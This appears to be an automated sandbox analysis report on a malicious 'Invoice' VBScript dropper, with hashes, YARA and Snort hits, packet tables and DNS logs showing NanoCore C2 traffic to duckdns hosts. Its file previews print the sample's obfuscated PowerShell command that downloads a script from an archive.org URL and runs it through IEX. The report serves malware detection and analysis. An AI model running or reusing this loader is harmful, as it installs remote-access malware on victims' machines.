                                                                          SSDEEP:96:BZkj2NrdrBqDo1ZedrOZ+j2NrdrBqDo1ZO6vyGLGLwE:9JeJGJNvyGLGLwE
                                                                          MD5:707AB5E8985F0E7B8C7673619BF75D31
                                                                          SHA1:8F38465F1288122D7A8216E9B0579EE6B44F1EB6
                                                                          SHA-256:89816FFD2D33B50BA8A2BEEDB617BE308DCD448A85FBB658E715352F0DAA8DFD
                                                                          SHA-512:B53964B5C67C7CCC6E34452A078350ECF240C2B4B254B7E39119A8CAEB958284A69662F1CBEAE26598C31EEFECBF34F3F136AD31480C01520F84945EAD8B0AAB
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\Documents\20210803\PowerShell_transcript.301389.iaYgJ3Zj.20210803203913.txt, Author: Joe Security
                                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20210803203913..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');..Process ID: 6756..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..Serializ

                                                                          Static File Info

                                                                          General

                                                                          File type:ASCII text, with CRLF line terminators
                                                                          Entropy (8bit):5.530496672914687
                                                                          TrID:
                                                                            File name:3G1J49A6V_Invoice.vbs
                                                                            File size:913
                                                                            MD5:2da417ae523148f7d65220a2c44d1a0a
                                                                            SHA1:7173fc941d4c051cf4bf5b1eac46aa33f2e6b798
                                                                            SHA256:c3ddf55e53888193522a7b619370b746cb0a79502c5157a98754a9009f644a11
                                                                            SHA512:c96201929f4937e47106f5afc341a548f2f1f90e2a19a3b788836fb33b8bbc300152f4b4892fe00abd75c77f9f61f2c1d1c2d5d686e99dd2e99d799fa4a64721
                                                                            SSDEEP:12:PvUC6yh42bXCOXyE8fyAixHhZyMAHifvAeRoUVzM8NoeT8OobLqhP/v1VJv9Os/V:PvnnbyOXPtbfAMvAeym6bPiJFxV
                                                                            File Content Preview:Dim FBI....Set FBI= CreateObject("WScript.S"&"HELL")..Donal=chr(80) &"O" & Chr(87)..Trump = Chr(69)..mike = Chr(82) & "s"&"H" & Chr(69)..pompeo = Chr(76)..Elon =Chr(76)&" $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$".

                                                                            File Icon

                                                                            Icon Hash:e8d69ece869a9ec4

                                                                            Network Behavior

                                                                            Snort IDS Alerts

                                                                          Timestamp                 Protocol  SID      Message                             Source Port  Dest Port  Source IP    Dest IP
                                                                          08/03/21-20:41:49.000728  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49776        6700       192.168.2.4  185.244.30.23
                                                                          08/03/21-20:41:55.743249  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49777        6700       192.168.2.4  185.244.30.23
                                                                          08/03/21-20:42:02.846134  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49778        6700       192.168.2.4  185.244.30.23
                                                                          08/03/21-20:42:09.741092  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49779        6700       192.168.2.4  185.244.30.23
                                                                          08/03/21-20:42:16.538073  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49780        6700       192.168.2.4  185.244.30.23
                                                                          08/03/21-20:42:23.610473  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49781        6700       192.168.2.4  185.244.30.23
                                                                          08/03/21-20:42:30.609821  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49782        6700       192.168.2.4  185.244.30.23
                                                                          08/03/21-20:42:38.598742  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49783        6700       192.168.2.4  185.244.30.23
                                                                          08/03/21-20:42:45.767442  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49784        6700       192.168.2.4  185.244.30.23
                                                                          08/03/21-20:42:52.842480  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49785        6700       192.168.2.4  185.244.30.23
                                                                          08/03/21-20:42:59.878034  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49786        6700       192.168.2.4  185.244.30.23
                                                                          08/03/21-20:43:06.825128  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49787        6700       192.168.2.4  185.244.30.23
                                                                          08/03/21-20:43:13.226201  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49789        6700       192.168.2.4  185.244.30.23

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 3, 2021 20:39:15.987169981 CEST | 49746 | 443 | 192.168.2.4 | 207.241.227.125
Aug 3, 2021 20:39:16.164120913 CEST | 443 | 49746 | 207.241.227.125 | 192.168.2.4
Aug 3, 2021 20:39:16.164302111 CEST | 49746 | 443 | 192.168.2.4 | 207.241.227.125
Aug 3, 2021 20:39:16.183140993 CEST | 49746 | 443 | 192.168.2.4 | 207.241.227.125
Aug 3, 2021 20:39:16.359813929 CEST | 443 | 49746 | 207.241.227.125 | 192.168.2.4
Aug 3, 2021 20:39:16.360070944 CEST | 443 | 49746 | 207.241.227.125 | 192.168.2.4
Aug 3, 2021 20:39:16.360095978 CEST | 443 | 49746 | 207.241.227.125 | 192.168.2.4
Aug 3, 2021 20:39:16.360121012 CEST | 443 | 49746 | 207.241.227.125 | 192.168.2.4
Aug 3, 2021 20:39:16.360138893 CEST | 443 | 49746 | 207.241.227.125 | 192.168.2.4
Aug 3, 2021 20:39:16.360169888 CEST | 49746 | 443 | 192.168.2.4 | 207.241.227.125
Aug 3, 2021 20:39:16.360205889 CEST | 49746 | 443 | 192.168.2.4 | 207.241.227.125
Aug 3, 2021 20:39:16.366322994 CEST | 443 | 49746 | 207.241.227.125 | 192.168.2.4
Aug 3, 2021 20:39:16.366348028 CEST | 443 | 49746 | 207.241.227.125 | 192.168.2.4
Aug 3, 2021 20:39:16.366415024 CEST | 49746 | 443 | 192.168.2.4 | 207.241.227.125
Aug 3, 2021 20:39:16.372102976 CEST | 49746 | 443 | 192.168.2.4 | 207.241.227.125
Aug 3, 2021 20:39:16.548307896 CEST | 443 | 49746 | 207.241.227.125 | 192.168.2.4
Aug 3, 2021 20:39:16.549798012 CEST | 443 | 49746 | 207.241.227.125 | 192.168.2.4
Aug 3, 2021 20:39:16.575921059 CEST | 49746 | 443 | 192.168.2.4 | 207.241.227.125
Aug 3, 2021 20:39:16.754193068 CEST | 443 | 49746 | 207.241.227.125 | 192.168.2.4
Aug 3, 2021 20:39:16.754234076 CEST | 443 | 49746 | 207.241.227.125 | 192.168.2.4
Aug 3, 2021 20:39:16.754261017 CEST | 443 | 49746 | 207.241.227.125 | 192.168.2.4
Aug 3, 2021 20:39:16.754278898 CEST | 443 | 49746 | 207.241.227.125 | 192.168.2.4
Aug 3, 2021 20:39:16.754385948 CEST | 49746 | 443 | 192.168.2.4 | 207.241.227.125
Aug 3, 2021 20:39:17.754581928 CEST | 443 | 49746 | 207.241.227.125 | 192.168.2.4
Aug 3, 2021 20:39:17.754607916 CEST | 443 | 49746 | 207.241.227.125 | 192.168.2.4
Aug 3, 2021 20:39:17.754766941 CEST | 49746 | 443 | 192.168.2.4 | 207.241.227.125
Aug 3, 2021 20:39:39.292709112 CEST | 49746 | 443 | 192.168.2.4 | 207.241.227.125
Aug 3, 2021 20:39:39.331945896 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:39.511606932 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:39.511773109 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:39.512151003 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:39.692389965 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:39.692430973 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:39.692523956 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:39.692553997 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:39.692573071 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:39.692619085 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:39.692653894 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:39.694905043 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:39.694933891 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:39.695035934 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:39.696613073 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:39.877999067 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:39.878031015 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:39.880145073 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:40.060410023 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.060575008 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.060605049 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.060636997 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.060669899 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.060672045 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:40.060724974 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.060739994 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:40.060796976 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.060822964 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.060854912 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.060884953 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.060909986 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.060930967 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.060929060 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:40.060951948 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.060956001 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:40.061290979 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:40.241018057 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241045952 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241059065 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241075039 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241091013 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241106987 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241118908 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241142988 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241161108 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241177082 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241195917 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241214037 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241221905 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:40.241230011 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241245985 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:40.241246939 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241250038 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:40.241252899 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:40.241264105 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241272926 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:40.241281033 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241318941 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:40.241337061 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241358995 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:40.241360903 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241377115 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241386890 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241425037 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:40.241441011 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241457939 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241461039 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:40.241472960 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241487980 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.241502047 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:40.241545916 CEST | 49756 | 443 | 192.168.2.4 | 207.241.228.148
Aug 3, 2021 20:39:40.421477079 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4
Aug 3, 2021 20:39:40.421519995 CEST | 443 | 49756 | 207.241.228.148 | 192.168.2.4

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 3, 2021 20:39:02.850114107 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:02.884232044 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:04.121026039 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:04.157704115 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:04.335817099 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:04.369837999 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:05.176708937 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:05.201320887 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:06.523617029 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:06.550964117 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:07.846718073 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:07.874366045 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:09.027025938 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:09.062658072 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:10.253014088 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:10.285778999 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:11.707073927 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:11.733701944 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:13.112313032 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:13.145096064 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:14.161216021 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:14.188775063 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:15.038754940 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:15.071434975 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:15.941731930 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:15.974540949 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:16.065934896 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:16.090558052 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:17.267803907 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:17.295295954 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:18.492222071 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:18.519809008 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:19.373274088 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:19.398221016 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:20.742938995 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:20.770781994 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:21.854343891 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:21.879256010 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:22.926369905 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:22.953879118 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:35.208514929 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:35.244277954 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:39.292776108 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:39.330821991 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:53.083746910 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:53.138139009 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:53.713172913 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:53.751728058 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:54.465384960 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:54.497786999 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:55.000854015 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:55.033651114 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:55.566145897 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:55.598603964 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:55.705892086 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:55.733374119 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:56.324378967 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:56.356928110 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:56.813699007 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:56.847265005 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:58.230417967 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:58.268604994 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:39:59.858330011 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:39:59.893903017 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:40:00.575088978 CEST | 49228 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:40:00.609905958 CEST | 53 | 49228 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:40:01.035936117 CEST | 59794 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:40:01.061100006 CEST | 53 | 59794 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:40:11.122783899 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:40:11.159787893 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:40:46.455075979 CEST | 52752 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:40:46.487801075 CEST | 53 | 52752 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:40:50.338409901 CEST | 60542 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:40:50.371400118 CEST | 53 | 60542 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:41:48.610855103 CEST | 60689 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:41:48.751724005 CEST | 53 | 60689 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:41:55.443265915 CEST | 64206 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:41:55.571132898 CEST | 53 | 64206 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:42:02.624257088 CEST | 50904 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:42:02.657927990 CEST | 53 | 50904 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:42:09.395072937 CEST | 57525 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:42:09.430355072 CEST | 53 | 57525 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:42:16.328212023 CEST | 53814 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:42:16.363449097 CEST | 53 | 53814 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:42:23.406879902 CEST | 53418 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:42:23.439666986 CEST | 53 | 53418 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:42:30.407226086 CEST | 62833 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:42:30.439749002 CEST | 53 | 62833 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:42:38.310401917 CEST | 59260 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:42:38.345422983 CEST | 53 | 59260 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:42:45.546369076 CEST | 49944 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:42:45.580141068 CEST | 53 | 49944 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:42:52.505614042 CEST | 63300 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:42:52.634674072 CEST | 53 | 63300 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:42:59.561860085 CEST | 61449 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:42:59.691026926 CEST | 53 | 61449 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:43:06.619920969 CEST | 51275 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:43:06.655194998 CEST | 53 | 51275 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:43:12.629626989 CEST | 63492 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:43:12.760323048 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.4
Aug 3, 2021 20:43:12.834378958 CEST | 58945 | 53 | 192.168.2.4 | 8.8.8.8
Aug 3, 2021 20:43:12.868308067 CEST | 53 | 58945 | 8.8.8.8 | 192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 3, 2021 20:39:15.941731930 CEST | 192.168.2.4 | 8.8.8.8 | 0x7bbe | Standard query (0) | ia601405.us.archive.org | A (IP address) | IN (0x0001)
Aug 3, 2021 20:39:39.292776108 CEST | 192.168.2.4 | 8.8.8.8 | 0xbe89 | Standard query (0) | ia801408.us.archive.org | A (IP address) | IN (0x0001)
Aug 3, 2021 20:41:48.610855103 CEST | 192.168.2.4 | 8.8.8.8 | 0xa4b4 | Standard query (0) | newjan.duckdns.org | A (IP address) | IN (0x0001)
Aug 3, 2021 20:41:55.443265915 CEST | 192.168.2.4 | 8.8.8.8 | 0x4f8d | Standard query (0) | newjan.duckdns.org | A (IP address) | IN (0x0001)
Aug 3, 2021 20:42:02.624257088 CEST | 192.168.2.4 | 8.8.8.8 | 0x811f | Standard query (0) | newjan.duckdns.org | A (IP address) | IN (0x0001)
Aug 3, 2021 20:42:09.395072937 CEST | 192.168.2.4 | 8.8.8.8 | 0xc9fa | Standard query (0) | newjan.duckdns.org | A (IP address) | IN (0x0001)
Aug 3, 2021 20:42:16.328212023 CEST | 192.168.2.4 | 8.8.8.8 | 0x1b9e | Standard query (0) | newjan.duckdns.org | A (IP address) | IN (0x0001)
Aug 3, 2021 20:42:23.406879902 CEST | 192.168.2.4 | 8.8.8.8 | 0xe0e7 | Standard query (0) | newjan.duckdns.org | A (IP address) | IN (0x0001)
Aug 3, 2021 20:42:30.407226086 CEST | 192.168.2.4 | 8.8.8.8 | 0xdf8b | Standard query (0) | newjan.duckdns.org | A (IP address) | IN (0x0001)
Aug 3, 2021 20:42:38.310401917 CEST | 192.168.2.4 | 8.8.8.8 | 0x1427 | Standard query (0) | newjan.duckdns.org | A (IP address) | IN (0x0001)
Aug 3, 2021 20:42:45.546369076 CEST | 192.168.2.4 | 8.8.8.8 | 0xdec4 | Standard query (0) | newjan.duckdns.org | A (IP address) | IN (0x0001)
Aug 3, 2021 20:42:52.505614042 CEST | 192.168.2.4 | 8.8.8.8 | 0x813e | Standard query (0) | newjan.duckdns.org | A (IP address) | IN (0x0001)
Aug 3, 2021 20:42:59.561860085 CEST | 192.168.2.4 | 8.8.8.8 | 0xb3b4 | Standard query (0) | newjan.duckdns.org | A (IP address) | IN (0x0001)
Aug 3, 2021 20:43:06.619920969 CEST | 192.168.2.4 | 8.8.8.8 | 0xd94d | Standard query (0) | newjan.duckdns.org | A (IP address) | IN (0x0001)
Aug 3, 2021 20:43:12.629626989 CEST | 192.168.2.4 | 8.8.8.8 | 0xc508 | Standard query (0) | dangomra.duckdns.org | A (IP address) | IN (0x0001)
Aug 3, 2021 20:43:12.834378958 CEST | 192.168.2.4 | 8.8.8.8 | 0x2379 | Standard query (0) | newjan.duckdns.org | A (IP address) | IN (0x0001)

                                                                            DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 3, 2021 20:39:15.974540949 CEST | 8.8.8.8 | 192.168.2.4 | 0x7bbe | No error (0) | ia601405.us.archive.org | | 207.241.227.125 | A (IP address) | IN (0x0001)
Aug 3, 2021 20:39:39.330821991 CEST | 8.8.8.8 | 192.168.2.4 | 0xbe89 | No error (0) | ia801408.us.archive.org | | 207.241.228.148 | A (IP address) | IN (0x0001)
Aug 3, 2021 20:41:48.751724005 CEST | 8.8.8.8 | 192.168.2.4 | 0xa4b4 | No error (0) | newjan.duckdns.org | | 185.244.30.23 | A (IP address) | IN (0x0001)
